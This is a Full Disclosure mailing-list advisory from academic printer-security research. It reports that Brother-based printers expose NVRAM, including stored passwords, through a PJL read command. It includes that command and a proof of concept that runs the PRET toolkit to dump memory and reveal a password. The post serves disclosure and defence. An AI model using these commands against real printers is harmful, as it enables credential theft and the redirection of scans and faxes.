Date: Mon, 30 Jan 2017 13:43:42 +0100
From: Jens Müller <jens.a.mueller@....de>
To: fulldisclosure@...lists.org
Subject: [FD] Hacking Printers Advisory 3/6: Brother printers vulnerable to
 memory access via PJL commands

TL;DR:  In the scope of academic research on printer security, various
vulnerabilities in network printers and MFPs have been discovered. This
is advisory 3 of 6 of the `Hacking Printers' series. Each advisory
discusses multiple issues of the same category. This post is about
abusing Brother's proprietary PJL extensions to dump the printers NVRAM
and gain access to interesting stuff like passwords. The attack can be
performed by anyone who can print, for example through USB or network.
It can even be carried out by a malicious website, using advanced
cross-site printing techniques in combination with a novel technique we
call `CORS spoofing' (see
http://hacking-printers.net/wiki/index.php/Cross-site_printing).

======================[ Memory Access with PJL ]======================

-------------------------[ Affected Devices ]-------------------------

This vulnerability may potentially affect all Brother based laser
printers. It has been verfied for the devices listed below:

- Brother MFC-9120CN (Firmware version: K.1.06)
- Brother DCP-9045CDN (Firmware version: G.1.10)
- Konica Minolta bizhub 20p (Firmware version: 3.11)

Vendors informed: 2016-10-17

--------------------[ Vulnerability Description ]---------------------

The `Brother Laser Printer Technical Reference Guide' defines PJL
commands to `write data to or retrieve data from the specified address
of the printer's NVRAM':

----------------------------------------------------------------------
@PJL RNVRAM ADDRESS = X
----------------------------------------------------------------------

By incrementing the integer X and dumping the whole NVRAM an attacker
can gain access to the embedded web server passwords. Furthermore – if
set – user PINs, passwords for POP3/SMTP as well as for FTP and Active
Directory profiles can be obtained. For MFPs, the attacker may also be
able to change the Scan-to-FTP settings, so scanned documents are
delivered to an attacker-controlled FTP server or she can exchange fax
numbers in the address book whereby fax is sent to the attacker's fax
number instead.

This issue is not new. It has been discussed by Andrei Costin and
others. However it still seems to be present in Brother devices.

-------------------------[ Proof of Concept ]-------------------------

A Python based proof of concept software entitled Printer Exploitation
Toolkit (PRET) has been published. The attack can be reproduced as follows:

$ git clone https://github.com/RUB-NDS/PRET.git
$ cd PRET
$ ./pret.py -q printer pjl
Connection to printer established

Welcome to the pret shell. Type help or ? to list commands.
printer:/> nvram dump
Writing copy to nvram/printer
................................................................................
................................................................................
............................................MyS3cretPassw0rd....................
................................................................................

-----------------------[ Further Information ]------------------------

Information on Brother's nvram access bug/feature can be found at:
http://hacking-printers.net/wiki/index.php/Memory_access
http://www.undocprint.org/_media/formats/page_description_languages/brother_tech_reference_h_feb2004.pdf
http://andreicostin.com/papers/Conf%20-%20Hack.lu%20-%202010%20-%20Luxembourg%20-%20AndreiCostin_HackingPrintersForFunAndProfit.pdf
http://seclists.org/fulldisclosure/2013/Feb/40

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists